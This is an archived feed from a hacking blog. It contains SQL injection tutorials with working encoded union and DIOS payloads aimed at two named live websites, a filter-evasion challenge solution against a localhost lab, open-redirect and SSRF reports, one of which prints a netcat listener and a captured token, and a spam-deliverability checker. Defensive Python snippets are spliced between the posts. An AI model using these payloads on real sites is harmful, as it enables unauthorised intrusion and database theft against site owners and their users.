SQLi Basic (Black_EyE Blog, http://rootedup.com), feed dated Wed, 30 Aug 2017 06:41:37 +0000

Valid Email Inbox Checker
http://rootedup.com/2017/08/12/valid-email-inbox-checker/ (Sat, 12 Aug 2017 12:06:00 +0000)

Hi guys,
Take my Salam. Here is Shaifullah Shaon (Black_EyE), an ethical hacker from Bangladesh.

Here is a script called “Valid Email Inbox Checker”.

It checks whether mail sent from your server lands in the recipient's inbox or in the spam folder.
Let's go...

1. Upload the script to a server.
2. Open the script.
3. Enter the email addresses separated by a “,” or by line breaks, like:
shaon.durjoy@gmail.com, shaon.durjoy@hotmail.com
or
shaon.durjoy@gmail.com
shaon.durjoy@hotmail.com
4. Now check whether the email reached the inbox or not.
If the email arrives in the inbox, this server is able to deliver (spam) email into the inbox. Otherwise the server's email goes into the spam box.
5. So here the email went to the inbox, which means this server is able to deliver email into the inbox.

N.B.: The script also checks whether an email address is valid. For example, if the address contains an invalid symbol, like:
asdf@lol!.com
then the script says: OOOPSS!!! SOMETHING IS WRONG.

Don’t use this script in a bad way. Enjoy and use this script.

Valid Email Checker: Download From Here

Regards,
Shaifullah Shaon (Black_EyE)

KashmiriWOlf Challenge 2 Solution
http://rootedup.com/2017/08/11/kashmiriwolf-challenge-2-solution/ (Fri, 11 Aug 2017 10:01:00 +0000)

Kashmiri_WOlf Challenge 2 Solution

Salam guys... I was getting too many requests to close my challenges (about advanced SQLi). Some guys said “Don't share your knowledge like this... it will be lamed”. But I am one of the greatest lamers ever, and Master Ajkaro is my inspiration...
He used to share his knowledge and people used to learn from it (at least 0.00001% did, including me).

So I thought “Sharing won't decrease my knowledge”, so I am gonna post solutions to some of my challenges.

Let's start from challenge no. 2.

Here is the link to this challenge:

http://forum.sqliwiki.com/showthread.php?tid=4832

I will use Master Ajkaro's style to explain things.

There are 4 tasks:
A. Print name with version
B. User (must be like the pic) and DB
C. Print tables starting with ‘u’ and not containing any ‘a’ in them, from the primary database (also tell how many such tables exist)

D. Print records and data in the tables and sort them in descending order if more than 1 (according to records)

Rules are:

For the first task don't use any of char, hex, binary, base64(), ascii, quotes, or [@@version, version(), @@GLOBAL.VERSION, @@VERSION_COMMENT] (for printing the version).
General rules: don't use lpad, rpad, group_concat; no underscored (_) concatenating functions; no variables; replace (not more than once); you may not use any nested function for DIOS; no repeat, insert, lpad, rpad, find_in_set, aes_decrypt/encrypt, len().
You can't use concat more than 3 times.
Use DIOS.
Your solution should be generic (should work on every site where such tables exist, excluding WAFed sites).
Your injection should work without knowing anything about the databases/tables.

First we will just complete the tasks. Let's start.
We have to concatenate the 4 tasks (A, B, C, D):
Our query will be like: concat(A,B,C,D)
Let's look at them separately.

Part A:
Print name with version. I will use localhost here.

Code:

concat('Kashmiri :: ', version())

And here it is:

localhost/sqli/?id=1 union select 1,concat('Kashmiri :: ',version()),3,4,5


OK, now check the rules for the first task.

1. For the first task don't use any char, hex, binary, base64(), ascii, quotes ~~> for printing your name

That means for printing the name we can't use the above-mentioned things...

But keep in mind there is another rule: “Your solution should be generic (should work on every site where such tables exist, excluding WAFed sites)”.
That means your code should work for other sites too... We will be using a mathematical function here:
conv(number, from_base, to_base)

Reference (https://dev.mysql.com/): Converts numbers between different number bases. Returns a string representation of the number N, converted from base from_base to base to_base. Returns NULL if any argument is NULL. The argument N is interpreted as an integer, but may be specified as an integer or a string. The minimum base is 2 and the maximum base is 36. If from_base is a negative number, N is regarded as a signed number. Otherwise, N is treated as unsigned. CONV() works with 64-bit precision.

Code:

concat(conv(N,10,32), conv(N,10,32), ... and so on)

So our query will be like:

localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32))),3,4,5


Proof ~~>

http://imgur.com/a/HG13S


2. [@@version, version(), @@GLOBAL.VERSION, @@VERSION_COMMENT] ~~> for printing the version

We know there are two tables in MySQL's information_schema:
global_variables
session_variables

and one is very rare:
system_variables

We all know the first usually has two columns:
variable_name
variable_value

If we dump these columns from these tables, they contain much necessary info... They also contain the version, so we will print the version from this table. (Note that INFORMATION_SCHEMA.GLOBAL_VARIABLES and SESSION_VARIABLES are deprecated as of MySQL 5.7.6 and were removed in MySQL 8.0, so this part of the solution only works on older servers.)

Code:

(select concat(variable_name,' :: ',variable_value)
 from information_schema.global_variables
 where variable_name sounds like '%version%')

Or

(select concat(variable_name,' :: ',variable_value)
 from information_schema.session_variables
 where variable_name sounds like '%version%')

(Note that SOUNDS LIKE compares SOUNDEX() values rather than matching a pattern, and SOUNDEX() ignores non-alphabetic characters, so the '%' wildcards have no effect here: the comparison is effectively against the soundex of 'version'.)

Let's concatenate these two parts 1 and 2: concat(1,2)

Code:

localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select
concat
(variable_name,' :: ',variable_value)
from information_schema.global_variables
where variable_name sounds
like '%version%'
)),3,4,5

Proof ~~>

http://imgur.com/a/dI4cO

lower() is used here to print the letters in lowercase:

lower(string)

Part A is completed with all rules followed.

Part B

User (must be like my PoC) and DB
The user is usually root@localhost.
Here the task was to print an asterisk (*) instead of @.

Let's print the user as in the PoC:

We will use the replace() function here:

replace(string, substring_to_be_replaced, replacement_string)

Example :

Code:

replace(0x24, 0x24, 'Kashmiri')

For User :

Code:

replace(user(), '@', '*')

The final code will be:

localhost/sqli/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name like '%version%' limit 1,1),'
',replace
(
user(),'@','*'
),'
',database()),3,4,5

Proof ~~>

http://imgur.com/a/V6WQ4

Part B is completed.
Let's move to part C.

Part C:
Print tables starting with ‘u’ and not containing any ‘a’ in them, from the primary database (also tell how many such tables exist)

We will use searching here (used Ajkaro's sentence ^_^).

For how many such tables exist, we will use count() first:

Code:

(select count(*) from information_schema.tables
 where table_schema=database() and table_name like 'u%' and table_name not like '%a%')

Now printing them (for this we will use DIOS):

Code:

(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,table_name)))x)

Our final query will be:

Code:

http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name)))x)),3-- -

Proof ~~>

http://imgur.com/a/1Dnan

Part C is completed.

Part D:

D. Print records and data in the tables and sort them in descending order if more than 1 (according to records)
This is easy as hell:

Final Query :

http://localhost/sqli-labs-master/Less-1/?id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32)),'
',(select concat (variable_name,' :: ',variable_value) from information_schema.global_variables where variable_name sounds like '%version%' ),'
',replace (user(),'@','*'),'
',database(),'
',(select count(*) from information_schema.tables where table_schema=database() and table_name like 'u%' and table_name not like '%a%' ),(Select(@x)from(select(@x:=0x00),(select(@x)from(information_schema.tables)where(table_schema=database())and(table_name like 'u%')and table_name not like '%a%' and@x:=concat(@x,'
',table_name,' :: ',table_rows,' :: ',data_length)))x)),3-- -

Proof ~~>

http://imgur.com/a/c3tFv

I will explain sorting in the next session. Here we had only one table, so I didn't sort them.

Credits to ~~> Master Ajkaro, Benzi, Makman, Khexan, Rummy, Cybrhckr

Regards

KASHMIRI_WOLF

FB link: Kashmiri_Wolf. Thanks to Sqli-Basic for letting me share this.

Base64 Based Routed Query By Kashmiri_Wolf
http://rootedup.com/2017/08/10/base64-based-routed-query-by-kashmiri_wolf/ (Thu, 10 Aug 2017 09:47:00 +0000)

Tutorial On Base64 Based Routed Query By Kashmiri_Wolf

Assalam-O-Alaikum guys!
This is Kashmiri_Wolf. Today I am gonna write about base64-based routed queries.
We will use a new function here (new for newbies like me), which is “from_base64()”.

So let's get straight to it. Here is the site:

http://www.egytravelcorner.com/ar/articals-more.php?id=1

It's a basic injection up to DIOS, so here is the query for the vulnerable column:

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(1),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Here a routed query is a way to DIOS it (for pure union-based injection and the $_GET method).

Hex is allowed here, but we will use a base64 routed query... Let's start...

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384 

Here is the error for the routed query. Let's fix the query and get the total number of columns (column count):

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KDEnLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

Query balanced. Let's check for order by:

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

No error.

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDEwLS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

9 columns. Let's check for the vulnerable column:

http://www.egytravelcorner.com/ar/articals-more.php?id=1%27/**shit**//*!00000Union*/(Select(from_base64('KC4xJyAgVW5pb24gU2VsZWN0IDEsMiwzLDQsNSw2LDcsOCw5OS0tIC0p')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))--%20-&mi_id=384

The vulnerable column is shown in the image.

Let's DIOS:

http://www.egytravelcorner.com/ar/articals-more.php?id=1'/**shit**//*!00000Union*/(Select(FROM_BASE64('KDEnLyoqXyoqLy8qITUwMDAwVW5pb24qL1NlbGVjdCAxMTEsMjIyLDMzMzMsY29uY2F0LyoqXyoqLygweDIyMmYzZTNjNjI3MjNlM2MyZjY0Njk3NjNlM2MyZjc0NjE2MjZjNjUzZTNjMmY3MDNlM2M2NjZmNmU3NDIwNjM2ZjZjNmY3MjNkNzI2NTY0MjA2NjYxNjM2NTNkNjM2MTZkNjI3MjY5NjEyMDczNjk3YTY1M2QzMzNlLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApKSw1NjYsNjY2LDc3Nyw4ODgsOTk5LS0gLSk=')),(2),(3),(4),(5),(6),(8),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))-- -&mi_id=384

So here is our final query!

Keeping the concept in mind, you can also do the same with char, I guess (not tested yet!!).

Credits to ~~> Master Benzi, Khexan Ro0t, Master Janus, Makman, Ajkaro, Rahul Maini, Raz

Sorry for the bad explanation... If there is any problem you can PM me here: Kashmiri_Wolf

Thanks to Sqli-Basic for letting me share this 🙂

Regards :
Kashmiri_Wolf

Unvalidated Redirects/ Open Redirect Vulnerability on Hackster Registrat…
http://rootedup.com/2017/08/10/unvalidated-redirects-open-redirect-vulnerability-on-hackster-registrat/ (Thu, 10 Aug 2017 05:58:00 +0000)

Hi Hackster,

Here is Shaifullah Shaon (Black_EyE), an ethical hacker,
a white hat cyber security researcher from Bangladesh, reporting a serious
[3rd ranking in OWASP] security vulnerability on your system.

I faced a technical security bug called “Unvalidated Redirects/Open Redirect Vulnerability on Hackster Registration URL and Login URL”.

Description of vuln:
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Reference:

Unvalidated_Redirects/ Open Redirect Vulnerability:
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
http://www-01.ibm.com/support/docview.wss?uid=swg21986393

Vuln Link:  https://www.hackster.io/users/sign_in?redirect_to=/feed&source=welcome-home
   https://www.hackster.io/users/sign_up?redirect_to=/feed&source=welcome-home

POC url:  https://www.hackster.io/users/sign_in?redirect_to=hTTpS:///google.com
   https://www.hackster.io/users/sign_up?redirect_to=hTTpS:///google.com

Let’s follow me:
1. Open the vuln link in a browser.
2. Change redirect_to= to any site. Now I try hTTps:///google.com
3. Just press the go button or hit ENTER.
4. And as you see, I can redirect to any site.

Let’s check again with facebook.com.
As you see, it redirects to any site using this method, and it is also a permanent redirect.

Please see my video PoC to understand clearly. Hopefully those are very critical issues.
Resolve those issues as soon as possible. Please see this video carefully for understanding.

Here is proof as video concept (unlisted): https://youtu.be/z8R4HDHvkoI
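A server-side check that would reject the PoC values above, added here as an example (my code, not Hackster's): a redirect_to value is accepted only when it is a local path or an absolute http(s) URL whose host is on an allow-list, so hTTpS:///google.com, //host and /\host are all sent to a default page instead. The allow-list and DEFAULT_LANDING are assumptions.

```python
from urllib.parse import urlsplit

# Hosts this application may send users to (assumed allow-list for the site in the report).
ALLOWED_REDIRECT_HOSTS = {"www.hackster.io", "hackster.io"}
# Where to land when the supplied target is not acceptable (assumed; the report's links use /feed).
DEFAULT_LANDING = "/feed"


def is_safe_redirect(target: str) -> bool:
    """Accept only a same-site path or an absolute http(s) URL whose host is allow-listed."""
    if not target:
        return False
    target = target.strip()
    # Backslashes, whitespace and NULs are parsed differently by browsers and URL
    # libraries; reject them outright instead of trying to normalise them.
    if any(c in target for c in "\\\t\r\n\x00 "):
        return False
    parts = urlsplit(target)  # lower-cases the scheme, so hTTpS and https compare equal
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: exactly one leading slash ("//host" is a scheme-relative URL).
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, mailto: and similar schemes end here
    # "hTTpS:///google.com" parses with an empty netloc (hostname None) and is rejected;
    # a parser that collapsed the slashes would still fail the host allow-list below.
    return parts.hostname is not None and parts.hostname in ALLOWED_REDIRECT_HOSTS


def resolve_redirect(target: str) -> str:
    """Return the validated target, or the default landing page when the value is unsafe."""
    return target.strip() if is_safe_redirect(target) else DEFAULT_LANDING


if __name__ == "__main__":
    for candidate in ("/feed", "hTTpS:///google.com", "//google.com/", "/\\google.com",
                      "https://www.hackster.io/feed", "https://www.hackster.io@google.com/"):
        print(f"{candidate!r:45} -> {resolve_redirect(candidate)}")
```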

Thank you
Shaifullah Shaon (Black_EyE)
shaon.durjoy@gmail.com

It’s an Online It Section
Please Subscribe us.

[Tutorial]Binary Based Routed Query[Kashmiri_Wolf]
http://rootedup.com/2017/08/09/tutorialbinary-based-routed-querykashmiri_wolf/ (Wed, 09 Aug 2017 15:32:00 +0000)

Hi brothers, I am here with some interesting stuff!

Whole credit goes to Kashmir_Hunter.
Today I will show you how to inject a site when most functions are almost blocked and your luck is good that day!!
You can get the basic concept of routed queries from here:
http://securityidiots.com/Web-Pentest/SQL-Injection/routed_sql_injection.html ~~> thanks to Master Zen

Site (used for the tutorial):

http://www.caresoft.ind.in/info.php?show=185

The injection process (up to the vuln column):

http://pastebin.com/dJMA9uhd

OK, this wasn't a big deal, but now the real task comes, and that is DIOS.
It was not too easy, so let's look for a routed query, because usually when we face a 403 forbidden error and with BOF it's not easy, or you can say impossible, to bypass information_schema. So a hexed routed query is the best option; if you are lucky you can find one in the target site. But the problem here is that hex allows only one character.

See how:

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0x27,2,3,4,5,6,7-- -

(An error means a routed query exists)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0x3127,2,3,4,5,6,7-- -

(403 forbidden) and we can't bypass it here, so let's think: if we can print our name with hex, and it also works for routed queries, then we can also do it with binary/char/base64. I will show you binary-based and base64-based routed queries here.

Now let's see how.

First do the same as for the hexed routed query:

00110001 00100111 (remove the spaces)
Put this in one column (the 1st), adding 0b at the start so it is executed as binary:

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111 ,2,3,4,5,6,7-- -

(got an error)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100101101001011010010000000101101,2,3,4,5,6,7-- -

Query balanced. Now let's check for order by:

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100100000011011110111001001100100011001010111001000100000011000100111100100100000001100010011000000101101001011010010000000101101,2,3,4,5,6,7-- - 

(means order by 10 ~~> error)

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b0011000100100111001000000110111101110010011001000110010101110010001000000110001001111001001000000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

(order by 7 ~~> no error)

Let's find the vuln columns:

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b001100010010011100100000011101010110111001101001011011110110111000100000011100110110010101101100011001010110001101110100001000000011000100101100001100100010110000110011001011000011010000101100001101010010110000110110001011000011011100101101001011010010000000101101,2,3,4,5,6,7-- -

Here we got the vulnerable column, and that is 3 (see the image).

Now let's DIOS the site:

http://www.caresoft.ind.in/info.php?show=185e0UnION%23%0aSelect 0b00110001001001110010000001110101011011100110100101101111011011100010000001110011011001010110110001100101011000110111010000100000001100010010110000110010001011000110001101101111011011100110001101100001011101000010100000110000011110000011001000110010001100100110011000110011011001010011001000110010001100110110010100110010011001100011001101100101001100110110001100110110001101100011011001100110001101100110010100110111001101000011001000110000001101100011001100110110011001100011011001100011001101100110011000110111001100100011001000110000001100110110010000110111001100100011011000110101001101100011010000110011011001010011010001100010001101100011100100110110011000110011011001100011001101100011010100110111001100100010110001101101011000010110101101100101010111110111001101100101011101000010100000110110001011000100000000111010001111010011000001111000001100000110000100101100001010000111001101100101011011000110010101100011011101000010100000110001001010010110011001110010011011110110110100101000011010010110111001100110011011110111001001101101011000010111010001101001011011110110111001011111011100110110001101101000011001010110110101100001001011100110001101101111011011000111010101101101011011100111001100101001011101110110100001100101011100100110010101000000001110100011110101101101011000010110101101100101010111110111001101100101011101000010100000110101001100010011000100101100010000000010110000110000011110000011001101100011001101100110001100110110001110010011001101100101001011000111010001100001011000100110110001100101010111110110111001100001011011010110010100101100011000110110111101101100011101010110110101101110010111110110111001100001011011010110010100101001001010010010110001000000001010010010110000110000011110000011001101100011001100100110011000110110001101100011011001100110001101100110010100110111001101000011001101100101001010010010110000110100001011000011010100101100001101100010110000110111001011010010110100100000001011
01,2,3,4,5,6,7-- -

This is our final query!!!
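The conv() name in the challenge 2 post, and the 0b... and from_base64() literals in this post and the base64 post, all carry a plain string in an encoded form. This added example (mine, not from any of the posts) decodes those literal forms out of a captured query string, the way an analyst would when reading such a request in a web-server log. mysql_conv mirrors MySQL's documented CONV() for bases 2 to 36; the regular expressions and SAMPLE_QUERIES are assumptions modelled on the literals shown in the posts.

```python
import base64
import re

# Digit alphabet used by MySQL CONV() for bases up to 36 (returned in upper case).
CONV_DIGITS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def mysql_conv(n: str, from_base: int, to_base: int) -> str:
    """Mirror MySQL CONV(N, from_base, to_base) for an unsigned N and bases 2..36."""
    if not (2 <= from_base <= 36 and 2 <= to_base <= 36):
        raise ValueError("CONV() bases must lie between 2 and 36")
    value = int(n, from_base)
    digits = []
    while value:
        value, d = divmod(value, to_base)
        digits.append(CONV_DIGITS[d])
    return "".join(reversed(digits)) or "0"


# Literal forms seen in the posts: conv(N,f,t) optionally inside lower(...),
# 0b<bits> bit-value literals, and from_base64('<base64>') calls (assumed shapes).
CONV_CALL = re.compile(r"(lower\s*\(\s*)?conv\s*\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
BIT_LITERAL = re.compile(r"(?<![0-9A-Za-z])0b([01]+)(?![0-9A-Za-z])", re.I)
B64_CALL = re.compile(r"from_base64\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)


def decode_conv_string(payload: str) -> str:
    """Join the characters that a run of conv()/lower(conv()) calls evaluates to."""
    chars = []
    for wrapped, n, f, t in CONV_CALL.findall(payload):
        ch = mysql_conv(n, int(f), int(t))
        chars.append(ch.lower() if wrapped else ch)
    return "".join(chars)


def decode_bit_literal(bits: str) -> str:
    """Decode a 0b... literal into the byte string MySQL uses it as in string context."""
    if bits[:2].lower() == "0b":
        bits = bits[2:]
    if not bits or len(bits) % 8:
        raise ValueError("bit-literal length is not a multiple of 8")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("latin-1")


def decode_payload_literals(payload: str) -> list:
    """Return (kind, decoded_text) for each encoded literal found in one captured query."""
    found = []
    if CONV_CALL.search(payload):
        found.append(("conv", decode_conv_string(payload)))
    for bits in BIT_LITERAL.findall(payload):
        found.append(("bit", decode_bit_literal(bits)))
    for b64 in B64_CALL.findall(payload):
        found.append(("base64", base64.b64decode(b64).decode("latin-1")))
    return found


# Constructed sample request fragments carrying the literal forms shown in the posts.
SAMPLE_QUERIES = [
    "id=1' and false union select 1,concat(conv(20,10,32),lower(conv(10,10,32)),"
    "lower(conv(28,10,32)),lower(conv(17,10,32)),lower(conv(22,10,32)),"
    "lower(conv(18,10,32)),lower(conv(27,10,32)),lower(conv(18,10,32))),3,4,5",
    "show=185e0UnION%23%0aSelect 0b0011000100100111 ,2,3,4,5,6,7-- -",
    "id=1'/*!00000Union*/(Select(from_base64('KDEnIG9yZGVyIGJ5IDktLSAtKQ==')),(2),(3))",
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        for kind, text in decode_payload_literals(q):
            print(f"{kind:>6}: {text!r}")
```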

Credits to ~~> Master Benzi, Khexan Ro0t, Master Janus, Makman, Ajkaro, Rahul Maini, Raz

Sorry for the bad explanation... If there is any problem you can PM me here: Kashmiri_Wolf [FB]

The binary based routed query will be posted in the next part... Stay tuned for that...
Thanks to Sqli-Basic for letting me share this.

SSRF (Server Side Request Forgery) on slack.com
http://rootedup.com/2017/08/09/ssrf-server-site-request-forgeryon-slack-com/ (Wed, 09 Aug 2017 10:26:00 +0000)

Hi Slack Security Team,

Here is Shaifullah Shaon (Black_EyE), an ethical hacker,
a white hat cyber security researcher from Bangladesh, reporting a serious
[3rd ranking in OWASP] security vulnerability on your system.

I faced a technical security bug called “SSRF (Server Side Request Forgery) on slack.com”.

Now I have exploited it. If you want to verify further, you can see my video PoC, which is unlisted on my YouTube channel.

Let’s follow me:

1. I already opened my account.
2. I created an app, which I installed into my chat box.
3. Now I use a /command for which I set the URL http://scanme.nmap.org:22
4. Now I put /comma (slash command) in the message box.
   SSRF Testing APP 10:39 AM
   Only visible to you
   SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
   As you see, it shows the OpenSSH version.
5. Now I change the website URL from http://scanme.nmap.org:22 to 31.208.61.136 (this is my own SSH server) and use port 55.
6. Now again I put /comma (slash command) in the message box.
7. As you see here, the Slack message box shows me 503 (Timeout was reached). But look at my SSH server: I had forwarded my port 55 using netcat.
    nc -lnvvp 55
    listening on [::]:55 …
   Here the port was listening. Now when I see the 503 (Timeout was reached) in the message box, here I get the user token from your server:

POST / HTTP/1.1
User-Agent: Slackbot 1.0 (+https://api.slack.com/robots)
Accept-Encoding: gzip,deflate
Accept: application/json,*/*
Content-Length: 298
Content-Type: application/x-www-form-urlencoded
Host: 31.208.61.136:55
Cache-Control: max-age=259200
Connection: keep-alive

token=KYfpmy2m8mSBrElI1lB8SR8a&team_id=T699WGVQS&team_domain=testdevopsdaveteam&channel_id=D6AKZDF6W&channel_name=directmessage&user_id=U6APVADK7&user_name=testingfuck&command=%2Fcomma&text=&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT699WGVQS%2F215699702339%2F1OUns1YkN1jhXulMpjHVgG5x
  
  
** Note: An attacker can steal the user token using this issue.

Please see my video PoC to understand clearly. Hopefully those are very critical issues.
Resolve those issues as soon as possible.

Here is proof as video concept (unlisted): https://youtu.be/REV3IG5qGFc
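One defensive control for this class of bug, added here as an example (my code, not Slack's): an egress check applied to a user-supplied callback URL before the server fetches it, which would have refused both scanme.nmap.org:22 and 31.208.61.136:55 on the port policy alone and also refuses non-public addresses. ALLOWED_PORTS, the sample host names and the resolved addresses passed in are assumptions; the function never touches the network itself.

```python
import ipaddress
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}
# Assumed policy: callbacks speak HTTP(S) on the standard ports only, so the
# SSH banner grab on port 22 and the netcat listener on port 55 are refused.
ALLOWED_PORTS = {80, 443}


def _is_public(ip) -> bool:
    """True only for addresses outside loopback, private, link-local and similar ranges."""
    ip = ipaddress.ip_address(ip)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url: str, resolved_ips=()) -> tuple:
    """Validate a user-supplied callback URL before the server makes a request to it.

    resolved_ips is the DNS answer the caller already obtained for the host (passed in
    so this function runs offline); a literal IP host needs no lookup. The caller should
    connect to one of the checked addresses rather than resolving the name again.
    Returns (allowed, reason).
    """
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or DEFAULT_PORTS[scheme]
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        ips = [ipaddress.ip_address(host)]  # literal IP in the URL
    except ValueError:
        ips = [ipaddress.ip_address(i) for i in resolved_ips]
    if not ips:
        return False, "host did not resolve"
    for ip in ips:
        if not _is_public(ip):
            return False, f"{ip} is not a public address"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the two targets from the report plus a few typical SSRF probes.
    for url, ips in (("http://scanme.nmap.org:22", ()),
                     ("http://31.208.61.136:55", ()),
                     ("http://169.254.169.254/latest/meta-data/", ()),
                     ("http://localhost/", ("127.0.0.1",)),
                     ("https://hooks.example.net/callback", ("1.2.3.4",))):
        print(f"{url:45} -> {check_outbound_url(url, ips)}")
```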

Thank you
Shaifullah Shaon (Black_EyE)
shaon.durjoy@gmail.com

It’s an Online It Section
Please Subscribe us.

Sqli Challenge Solution
http://rootedup.com/2017/08/07/sqli-challenge-solution/ (Mon, 07 Aug 2017 07:56:00 +0000)

Sqli Challenge Solution (Easy) By Kashmiri_wolf
http://rootedup.com/2017/08/07/sqli-challenge-solutioneasy-by-kashmiri_wolf/ (Mon, 07 Aug 2017 07:52:00 +0000)

Bouabid Challenge Solution by Kashmiri_wolf
http://rootedup.com/2017/08/07/bouabid-challenge-solution-by-kashmiri_wolf/ (Mon, 07 Aug 2017 07:47:00 +0000)

Challenge Solution Of Ahmed Chaanda By Kashmiri_wolf
http://rootedup.com/2017/08/07/callenge-solution-of-ahmed-chaanda-by-kashmiri_wolf/ (Mon, 07 Aug 2017 07:40:00 +0000)